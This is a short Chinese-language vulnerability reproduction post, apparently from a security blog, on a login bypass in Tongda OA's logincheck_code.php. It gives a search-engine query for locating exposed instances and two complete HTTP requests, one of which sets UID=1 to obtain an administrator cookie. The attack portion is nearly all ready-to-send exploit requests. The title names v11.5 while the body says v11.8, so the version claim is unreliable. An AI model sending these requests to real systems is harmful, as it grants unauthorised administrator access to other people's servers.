通达OA v11.5 logincheck_code.php 登陆绕过漏洞

漏洞描述

通达OA v11.8 logincheck_code.php存在登陆绕过漏洞,通过漏洞攻击者可以登陆系统管理员后台。

漏洞影响

通达OA v11.8

网络测绘

app=”TDXK-通达OA”

漏洞复现

登陆页面

20231123112213343-3452bdb2-4def-49db-a4ee-22b9907987bb (1)

发送第一个请求包

GET /general/login_code.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

20231123112525876-32f1f645-e706-4a4a-9173-9dc778baf3b6 (1)

再发送第二个恶意请求

POST /logincheck_code.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

CODEUID=%7BD384F12E-A758-F44F-8A37-20E2568306A7%7D&UID=1

20231123112618249-a058d416-2f02-4917-b7e4-ad5f3dc32ff2 (1)

获取cookie后访问管理员页面 /general/index.php

20231123112700204-abd98937-d1a4-4aef-9ab7-14710f862530 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容